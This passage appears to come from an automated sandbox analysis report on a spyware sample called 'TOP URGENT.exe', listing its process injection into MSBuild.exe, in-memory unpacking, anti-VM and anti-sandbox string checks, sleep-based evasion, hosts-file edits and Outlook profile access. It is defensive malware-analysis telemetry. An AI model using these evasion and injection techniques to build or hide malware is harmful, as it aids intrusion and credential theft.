                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\TOP URGENT.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\TOP URGENT.exe.logJump to behavior
                      Source: classification engineClassification label: mal100.spre.troj.adwa.spyw.evad.winEXE@3/2@2/1
                      Source: C:\Users\user\Desktop\TOP URGENT.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                      Source: MSBuild.exe, 00000004.00000002.505657979.0000000005CE9000.00000004.00000001.sdmpBinary or memory string: f:\binaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\x86\MSBuild.pdb
                      Source: MSBuild.exe, 00000004.00000002.495388966.0000000000AF8000.00000004.00000001.sdmpBinary or memory string: f:\binaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\x86\MSBuild.pdb+
                      Source: MSBuild.exe, 00000004.00000002.505611329.0000000005CD7000.00000004.00000001.sdmpBinary or memory string: f:\binaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\x86\MSBuild.pdbsmtpalmuntakhaba.com))4
                      Source: MSBuild.exe, 00000004.00000002.505657979.0000000005CE9000.00000004.00000001.sdmpBinary or memory string: f:\binaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\x86\MSBuild.pdbD
                      Source: TOP URGENT.exe, Form1.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                      Source: 0.2.TOP URGENT.exe.9f0000.0.unpack, Form1.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                      Source: 0.0.TOP URGENT.exe.9f0000.0.unpack, Form1.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                      Source: TOP URGENT.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                      Source: TOP URGENT.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                      Source: Binary string: C:\Windows\System.pdbpdbtem.pdb source: MSBuild.exe, 00000004.00000002.505630995.0000000005CE0000.00000004.00000001.sdmp
                      Source: Binary string: l0C:\Windows\MSBuild.pdb source: MSBuild.exe, 00000004.00000002.495388966.0000000000AF8000.00000004.00000001.sdmp
                      Source: Binary string: f:\binaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\x86\MSBuild.pdb source: MSBuild.exe, 00000004.00000002.505657979.0000000005CE9000.00000004.00000001.sdmp
                      Source: Binary string: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.PDB source: MSBuild.exe, 00000004.00000002.495388966.0000000000AF8000.00000004.00000001.sdmp
                      Source: Binary string: \??\C:\Windows\symbols\exe\MSBuild.pdb source: MSBuild.exe, 00000004.00000002.505554531.0000000005C80000.00000004.00000001.sdmp
                      Source: Binary string: f:\binaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\x86\MSBuild.pdb+ source: MSBuild.exe, 00000004.00000002.495388966.0000000000AF8000.00000004.00000001.sdmp
                      Source: Binary string: MSBuild.PDB source: MSBuild.exe, 00000004.00000002.495388966.0000000000AF8000.00000004.00000001.sdmp
                      Source: Binary string: C:\Windows\MSBuild.pdbpdbild.pdb source: MSBuild.exe, 00000004.00000002.505630995.0000000005CE0000.00000004.00000001.sdmp
                      Source: Binary string: f:\binaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\x86\MSBuild.pdbsmtpalmuntakhaba.com))4 source: MSBuild.exe, 00000004.00000002.505611329.0000000005CD7000.00000004.00000001.sdmp
                      Source: Binary string: f:\binaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\x86\MSBuild.pdbD source: MSBuild.exe, 00000004.00000002.505657979.0000000005CE9000.00000004.00000001.sdmp
                      Source: Binary string: lC:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.pdbr source: MSBuild.exe, 00000004.00000002.495388966.0000000000AF8000.00000004.00000001.sdmp
                      Source: Binary string: \??\C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.pdb source: MSBuild.exe, 00000004.00000002.505554531.0000000005C80000.00000004.00000001.sdmp
                      Source: Binary string: .pdb source: MSBuild.exe, 00000004.00000002.495388966.0000000000AF8000.00000004.00000001.sdmp
                      Source: Binary string: symbols\exe\MSBuild.pdb source: MSBuild.exe, 00000004.00000002.495388966.0000000000AF8000.00000004.00000001.sdmp
                      Source: Binary string: \??\C:\Windows\symbols\dll\System.pdb source: MSBuild.exe, 00000004.00000002.505554531.0000000005C80000.00000004.00000001.sdmp

                      Data Obfuscation:

                      barindex
                      .NET source code contains potential unpackerShow sources
                      Source: TOP URGENT.exe, Form1.cs.Net Code: _X_X0FT_FT2 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: 0.2.TOP URGENT.exe.9f0000.0.unpack, Form1.cs.Net Code: _X_X0FT_FT2 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: 0.0.TOP URGENT.exe.9f0000.0.unpack, Form1.cs.Net Code: _X_X0FT_FT2 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: C:\Users\user\Desktop\TOP URGENT.exeCode function: 0_2_009F297F push 20000001h; retf 0_2_009F2992
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_00E1B517 push edi; retn 0000h4_2_00E1B519
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_00E1D51B push ebp; iretd 4_2_00E1D559
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_00E1DA85 push edi; ret 4_2_00E1DA86
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_00E1D380 pushfd ; retf 4_2_00E1D38D
                      Source: initial sampleStatic PE information: section name: .text entropy: 7.54096955911
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                      Malware Analysis System Evasion:

                      barindex
                      Yara detected AntiVM3Show sources
                      Source: Yara matchFile source: 00000000.00000002.244947880.0000000002D91000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: TOP URGENT.exe PID: 6352, type: MEMORYSTR
                      Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
                      Source: TOP URGENT.exe, 00000000.00000002.244947880.0000000002D91000.00000004.00000001.sdmpBinary or memory string: WINE_GET_UNIX_FILE_NAME
                      Source: TOP URGENT.exe, 00000000.00000002.244947880.0000000002D91000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
                      Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)Show sources
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                      Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)Show sources
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\Desktop\TOP URGENT.exe TID: 6356Thread sleep time: -40352s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exe TID: 6396Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7132Thread sleep time: -20291418481080494s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7148Thread sleep count: 1286 > 30Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7148Thread sleep count: 8566 > 30Jump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow / User API: threadDelayed 1286Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow / User API: threadDelayed 8566Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeThread delayed: delay time: 40352Jump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: TOP URGENT.exe, 00000000.00000002.244947880.0000000002D91000.00000004.00000001.sdmpBinary or memory string: vmware
                      Source: TOP URGENT.exe, 00000000.00000002.244947880.0000000002D91000.00000004.00000001.sdmpBinary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
                      Source: TOP URGENT.exe, 00000000.00000002.244947880.0000000002D91000.00000004.00000001.sdmpBinary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
                      Source: TOP URGENT.exe, 00000000.00000002.244947880.0000000002D91000.00000004.00000001.sdmpBinary or memory string: VMWARE
                      Source: TOP URGENT.exe, 00000000.00000002.244947880.0000000002D91000.00000004.00000001.sdmpBinary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
                      Source: TOP URGENT.exe, 00000000.00000002.244947880.0000000002D91000.00000004.00000001.sdmpBinary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
                      Source: TOP URGENT.exe, 00000000.00000002.244947880.0000000002D91000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II
                      Source: TOP URGENT.exe, 00000000.00000002.244947880.0000000002D91000.00000004.00000001.sdmpBinary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
                      Source: MSBuild.exe, 00000004.00000002.505611329.0000000005CD7000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_00B55598 LdrInitializeThunk,4_2_00B55598
                      Source: C:\Users\user\Desktop\TOP URGENT.exeMemory allocated: page read and write | page guardJump to behavior

                      HIPS / PFW / Operating System Protection Evasion:

                      barindex
                      Writes to foreign memory regionsShow sources
                      Source: C:\Users\user\Desktop\TOP URGENT.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000Jump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 402000Jump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 438000Jump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 43A000Jump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 8CB008Jump to behavior
                      Modifies the hosts fileShow sources
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile written: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Injects a PE file into a foreign processesShow sources
                      Source: C:\Users\user\Desktop\TOP URGENT.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 value starts with: 4D5AJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeJump to behavior
                      Source: MSBuild.exe, 00000004.00000002.500534051.0000000001370000.00000002.00020000.sdmpBinary or memory string: Program Manager
                      Source: MSBuild.exe, 00000004.00000002.500534051.0000000001370000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
                      Source: MSBuild.exe, 00000004.00000002.500534051.0000000001370000.00000002.00020000.sdmpBinary or memory string: Progman
                      Source: MSBuild.exe, 00000004.00000002.500534051.0000000001370000.00000002.00020000.sdmpBinary or memory string: Progmanlock
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Users\user\Desktop\TOP URGENT.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
